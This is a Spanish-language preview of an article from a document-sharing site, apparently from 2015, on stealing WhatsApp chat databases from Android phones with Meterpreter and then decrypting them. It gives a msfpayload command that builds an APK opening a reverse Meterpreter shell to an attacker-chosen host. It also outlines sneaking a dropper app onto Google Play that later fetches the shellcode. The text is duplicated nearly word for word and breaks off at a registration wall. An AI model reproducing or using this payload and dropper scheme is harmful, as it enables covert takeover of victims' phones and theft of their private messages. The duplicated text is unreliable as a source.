Robar WhatsApp de Android con Meterpret hellip
Páginas: 6 (1413 palabras)
Publicado: 4 de julio de 2015
Sabemos que existen muchos métodos para espiar WhatsApp, aunque semanas atrás salió a la luz
el método con el que WhatsApp para Android cifra y descifra las bases de datos de la aplicación.
Conseguir estas bases de datos en Android es sencillo, ya que se almacenan en la SDCard del
dispositivo, pero también pueden sacarse de un dispositivo iPhone si se tiene acceso local o al
backup, aunque elproceso podría complicarse un poco, en función de si hay jailbreak o no, si hay
SSH por defecto, y del tipo de dispositivo que sea y la versión del sistema iOS. Siempre podríamos
intentar encontrar una vía realizando un hacking a dispositivos iPhone completo.
Alejandro Ramos (@aramosf) liberó un script en Python dónde teniendo la base de datos cifrada
y el usuario de Gmail utilizado en el dispositivoAndroid se puede obtener las conversaciones
descifradas y listas para su lectura. Además, el servicioRecover Messages ya dispone de esta
funcionalidad para la recuperación de mensajes recuperados de una base de datos cifrada.
Figura 1: Script de descifrado de bases de datos Crypt5 de WhatsApp
¿Cómo funciona el cifrado y el descifrado? El algoritmo para cifrar es aes-cbc-192, la información
dela base de datos es cifrada utilizando una clave y el nombre de la cuenta de correo
electrónico del dispositivo. El modo cbc, cipher block chaining, aplica a cada bloque de texto
plano un XOR con el bloque anteriormente cifrado, para su posterior cifrado. De este modo cada
bloque de texto cifrado va a depender de todo lo que está en plano procesado hasta el momento.
El vector de inicialización haceque cada mensaje sea único.
PoC: El llamado Wonderland
En algunos ámbitos Meterpreter, una famosa shellcode utilizada por muchospentesters en el
maravilloso framework de explotación Metasploit, es conocido comoWonderland, ya que
proporciona al usuario todas las características en la toma de control de un dispositivo remoto, y
lo que haremos será jugar con él y ver qué cosas, entre otras muchas,podemos hacer. Algunas de
las cosas interesantes que podemos hacer con esta shellcode en un dispositivo móvil es robar la
base de datos de WhatsApp, y después descifrarla.
Lo primero es conseguir ejecutar Meterpreter en un dispositivo Android. Esto puede ser tarea no
sencilla, pero con un poco de imaginación se nos pueden ocurrir muchas vías. ¿Por qué no entrar
por la puerta principal? Sí,podemos intentar entrar porGoogle Play, ¿En serio?
En esta vida todo es probar, y como ya ha explicado Sergio de los Santos hay un ecosistema
de Malware y Fake Apps en Google Play lo suficientemente grande como para que se note mucho
que hemos metido un Meterpreter. Además, hemos visto que hay peleas por hacer fakes app de
WhatsApp, que hay quién se ha dado de alta como Apple Inc, los que se dedican ahacer estafas
de SMS Premium como la de la Linterna Molona y cibercriminales que roban el WhatsApp
directamente con supuestos juegos. ¡Manos a la obra!
Figura 2: Fakes App de un supuesto Apple Inc en Google Play
La primera vía sería utilizar la herramienta msfpayload para generar un APKinstalable en los
dispositivos Android, pero este APK no podrá ser subido a Google Play por diversos motivos,entre ellos que no está firmado por el desarrollador. Para la toma de contacto es totalmente
válido, por lo que os dejo aquí como hacer unAPK para Android que ejecute
una Meterpreter inversa:
msfpayload android/meterpreter/reverse_tcp LHOST=[dirección IP a la que se conecta la
shellcode] LPORT=[puerto a la que se conecta] R > nombre_fichero.apk
Figura 2: Creando una APK con un Meterpreter
La otravía sería desarrollar una APK que pida órdenes, por ejemplo, mediante unXML y que al
recibir una instrucción maliciosa en ese XML se conecte a un servidor dónde le esperaremos para
otorgarle un JAR, dónde empaquetado se encuentre lashellcode de Meterpreter. Este JAR se
puede ejecutar dentro del provider de laapp que la víctima descarga del Google Play. ¿En serio?
Sigamos adelante…
Ahora una vez...
el método con el que WhatsApp para Android cifra y descifra las bases de datos de la aplicación.
Conseguir estas bases de datos en Android es sencillo, ya que se almacenan en la SDCard del
dispositivo, pero también pueden sacarse de un dispositivo iPhone si se tiene acceso local o al
backup, aunque elproceso podría complicarse un poco, en función de si hay jailbreak o no, si hay
SSH por defecto, y del tipo de dispositivo que sea y la versión del sistema iOS. Siempre podríamos
intentar encontrar una vía realizando un hacking a dispositivos iPhone completo.
Alejandro Ramos (@aramosf) liberó un script en Python dónde teniendo la base de datos cifrada
y el usuario de Gmail utilizado en el dispositivoAndroid se puede obtener las conversaciones
descifradas y listas para su lectura. Además, el servicioRecover Messages ya dispone de esta
funcionalidad para la recuperación de mensajes recuperados de una base de datos cifrada.
Figura 1: Script de descifrado de bases de datos Crypt5 de WhatsApp
¿Cómo funciona el cifrado y el descifrado? El algoritmo para cifrar es aes-cbc-192, la información
dela base de datos es cifrada utilizando una clave y el nombre de la cuenta de correo
electrónico del dispositivo. El modo cbc, cipher block chaining, aplica a cada bloque de texto
plano un XOR con el bloque anteriormente cifrado, para su posterior cifrado. De este modo cada
bloque de texto cifrado va a depender de todo lo que está en plano procesado hasta el momento.
El vector de inicialización haceque cada mensaje sea único.
PoC: El llamado Wonderland
En algunos ámbitos Meterpreter, una famosa shellcode utilizada por muchospentesters en el
maravilloso framework de explotación Metasploit, es conocido comoWonderland, ya que
proporciona al usuario todas las características en la toma de control de un dispositivo remoto, y
lo que haremos será jugar con él y ver qué cosas, entre otras muchas,podemos hacer. Algunas de
las cosas interesantes que podemos hacer con esta shellcode en un dispositivo móvil es robar la
base de datos de WhatsApp, y después descifrarla.
Lo primero es conseguir ejecutar Meterpreter en un dispositivo Android. Esto puede ser tarea no
sencilla, pero con un poco de imaginación se nos pueden ocurrir muchas vías. ¿Por qué no entrar
por la puerta principal? Sí,podemos intentar entrar porGoogle Play, ¿En serio?
En esta vida todo es probar, y como ya ha explicado Sergio de los Santos hay un ecosistema
de Malware y Fake Apps en Google Play lo suficientemente grande como para que se note mucho
que hemos metido un Meterpreter. Además, hemos visto que hay peleas por hacer fakes app de
WhatsApp, que hay quién se ha dado de alta como Apple Inc, los que se dedican ahacer estafas
de SMS Premium como la de la Linterna Molona y cibercriminales que roban el WhatsApp
directamente con supuestos juegos. ¡Manos a la obra!
Figura 2: Fakes App de un supuesto Apple Inc en Google Play
La primera vía sería utilizar la herramienta msfpayload para generar un APKinstalable en los
dispositivos Android, pero este APK no podrá ser subido a Google Play por diversos motivos,entre ellos que no está firmado por el desarrollador. Para la toma de contacto es totalmente
válido, por lo que os dejo aquí como hacer unAPK para Android que ejecute
una Meterpreter inversa:
msfpayload android/meterpreter/reverse_tcp LHOST=[dirección IP a la que se conecta la
shellcode] LPORT=[puerto a la que se conecta] R > nombre_fichero.apk
Figura 2: Creando una APK con un Meterpreter
La otravía sería desarrollar una APK que pida órdenes, por ejemplo, mediante unXML y que al
recibir una instrucción maliciosa en ese XML se conecte a un servidor dónde le esperaremos para
otorgarle un JAR, dónde empaquetado se encuentre lashellcode de Meterpreter. Este JAR se
puede ejecutar dentro del provider de laapp que la víctima descarga del Google Play. ¿En serio?
Sigamos adelante…
Ahora una vez...
Leer documento completo
Regístrate para leer el documento completo.